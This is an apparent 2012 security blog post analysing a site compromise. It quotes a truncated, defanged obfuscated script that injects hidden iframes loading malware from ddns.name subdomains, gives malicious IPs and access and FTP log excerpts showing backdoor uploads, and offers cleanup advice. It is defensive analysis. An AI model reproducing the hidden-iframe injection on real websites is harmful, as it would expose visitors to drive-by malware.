msgbartop
Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
msgbarbottom
Loading site search ...

Script Injection (*.ddns.name) and Backdoors

   12 Feb 12   Filed in Short Attack Reviews

Just a quick review of hacker attack that I came across this week.

The attackers inject a malicious script into legitimate web pages on compromised sites and update the script several time a day (sometimes they change the script code and sometimes just make sure the script is still there, in case webmasters removed it). Typical scripts looks like this:

var $E=(Date);if($E){$f=['2*%0)%5}%1','%3{%b(%9_%8...skipped...(1))[$s.$Aj]($l[$0][$s.$1k](0,1));}}return this;},$3=$l(),$f='';$pi('l\x65\x6E\x67th');if ((Number)&&(Array)&&(Function)&&(String)&&(Image)){if(document.getElementsByTagName('s cript').length > 0){document.wr ite('<i frame src="'+document.getElementById('____Uy').innerHTML+'" style="position: fixed; left:100px; top:-1000px; visibility: hidden;"></iframe>');}}

The scripts create invisible iframes that load malicious content from subdomains of ddns.name (ddns.name is a free dynamic DNS service). E.g.

<i frame src="hxxp://npputdzykop .ddns .name/index.php?showtopic=892380" style="position: fixed; left:100px; top:-1000px; visibility: hidden;"></iframe>

hxxp://bacmdmrnxdf .ddns .name/index.php?showtopic=892380
hxxp://hjuusnhqspt .ddns .name/index.php?showtopic=892380
hxxp://kmkyqilckhi .ddns .name/index.php?showtopic=892380
hxxp://npputdzykop .ddns .name/index.php?showtopic=892380
hxxp://jnobuznhccv .ddns .name/index.php?showtopic=892380

Last time I checked, the malicious subdomains pointed to 37.59.74.146.

When Google detects such malware on websites, you will see the following (or similar) messages on Safe Browsing diagnostic pages:

Malicious software is hosted on 7 domain(s), including hyyjkhfgmxk .ddns .name/, google-‐analytics .com/, kmkyqilckhi.ddns.name/.

1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including google‐‐analytics .com/

Access log analysis

I had a chance to analyze access logs of one of the infected sites. Here’s what I found there:

During 24 hours, IP addresss 81.17.24.72 made 842 successful (response code 200) POST requests to backdoor files in 142 different locations on that server.

Some malicious requests:

81.17.24.72 - - [08/Feb/2012:16:11:37 -0500] "POST /e9a3.php HTTP/1.1" 200 41869 "-" "-"
81.17.24.72 - - [08/Feb/2012:17:45:12 -0500] "POST /e9a3.php HTTP/1.1" 200 460 "-" "-"
81.17.24.72 - - [09/Feb/2012:09:56:36 -0500] "POST /tmp/9ef4.php HTTP/1.1" 200 22467 "-" "-"
81.17.24.72 - - [09/Feb/2012:10:04:21 -0500] "POST /...skipped.../images/9ef4.php HTTP/1.1" 200 22491 "-" "-"
81.17.24.72 - - [09/Feb/2012:10:09:02 -0500] "POST /...skipped.../includes/admin/9ef4.php HTTP/1.1" 200 22499 "-" "-"
81.17.24.72 - - [09/Feb/2012:10:07:29 -0500] "POST /...skipped.../modules/9ef4.php HTTP/1.1" 200 22492 "-" "-"
81.17.24.72 - - [09/Feb/2012:12:30:13 -0500] "POST /public_html/...skipped.../wp-content/9ef4.php HTTP/1.1" 200 22484 "-" "-"
81.17.24.72 - - [09/Feb/2012:12:35:29 -0500] "POST //public_html/...skipped.../wp-includes/9ef4.php HTTP/1.1" 200 22507 "-" "-"
81.17.24.72 - - [09/Feb/2012:12:37:59 -0500] "POST /public_html/...skipped.../cgi-bin/9ef4.php HTTP/1.1" 200 22488 "-" "-"
81.17.24.72 - - [09/Feb/2012:13:01:09 -0500] "POST /public_html/...skipped.../wp-admin/9ef4.php HTTP/1.1" 200 22503 "-" "-"

Resolving the issue

As you can see, it not enough to remove malicious scripts from legitimate files. To prevent reinfections, you should also find and delete all backdoor files.

In this particular case, you might also want to block the IP 81.17.24.72. Most Control Panels provide an options to block requests from specific IPs. Alternatively, if you use Apache, you might want to add the following lines into the topmost .htaccess file

order allow,deny
deny from 81.17.24.72
allow from all

Find security hole

Actually, to stop this attack completely, you should figure out how the attacker managed to upload the backdoor files to your server in the first place. Unfortunately, I didn’t have access to historical logs of the compromised sites and couldn’t trace the beginning of the attack. If your site is affected by this hack and you have access logs for the last 2-4 weeks, I would love to hear from you.

At this point, I can suggest that you update all software on you server (including themes, plugins and component) and change all passwords. And don’t forget to regularly scan you server for suspicious content.

Update (Feb 16, 2012): I’ve managed to get FTP logs of the compromised site and now I’m confident that this attack uses stolen FTP credentials.

Here are some most representative lines from the logs:

...
Sun Feb 12 10:04:54 2012 0 81.17.24.72 2280 /home/username/db21.php b _ i r username ftp 1 * c
Sun Feb 12 10:27:58 2012 0 81.17.24.72 2280 /home/username/.autorespond/ca82.php b _ i r intern64 ftp 1 * c
Sun Feb 12 11:01:23 2012 0 81.17.24.72 2280 /home/username/.cpaddons/f041.php b _ i r username ftp 1 * c
Sun Feb 12 11:29:42 2012 0 81.17.24.72 2280 /home/username/.cpanel/a473.php b _ i r username ftp 1 * c
Sun Feb 12 11:54:51 2012 0 81.17.24.72 2280 /home/username/.htpasswds/3009.php b _ i r username ftp 1 * c
Sun Feb 12 12:41:48 2012 0 81.17.24.72 2280 /home/username/.trash/0fc4.php b _ i r username ftp 1 * c
Sun Feb 12 13:22:50 2012 0 81.17.24.72 2280 /home/username/cgi-bin/9e35.php b _ i r username ftp 1 * c
Sun Feb 12 13:58:39 2012 0 81.17.24.72 2280 /home/username/c7b0.php b _ i r username ftp 1 * c
...

In the logs, we see the notorious IP address 81.17.24.72 that uploads backdoor files to various directories on server. Later, the same 81.17.24.72 IP uses HTTP POST requests to the uploaded backdoors to infect legitimate files. It currently infects files that have the following strings in their filenames: index, default.

Once your FTP credentials are stolen, they can be sold to multiple hacker groups. That’s why it’s quite typical that a few gangs try to exploit the same site at the same time. In this case, I found traces of a couple of different attacks that also used the FTP vector.

For example, IPs “91.121.137.14“, “91.121.91.142” and “74.208.132.83” routinely uploaded files “extra.php” and “frame_cleaner.php” and then subsequently requested them via HTTP GET requests.

198.66.254.199 appended some code to wp-blog-header.php

216.183.83.126 injected cloaked spammy links into “header.php” of all WordPress themes and modified .htaccess files.

As you can see, many attacks use both stolen FTP credentials (to initially break into legitimate websites) and backdoor files (to control and reinfect websites even when webmasters change passwords). In this post, I showed how useful FTP and web server access logs can be to find security holes and malicious files.

Webmasters: do you have logs for your sites? If not, go and enable logging right now!

##
Your comments and any additional informations are welcome.

Similar posts:

Comments are closed.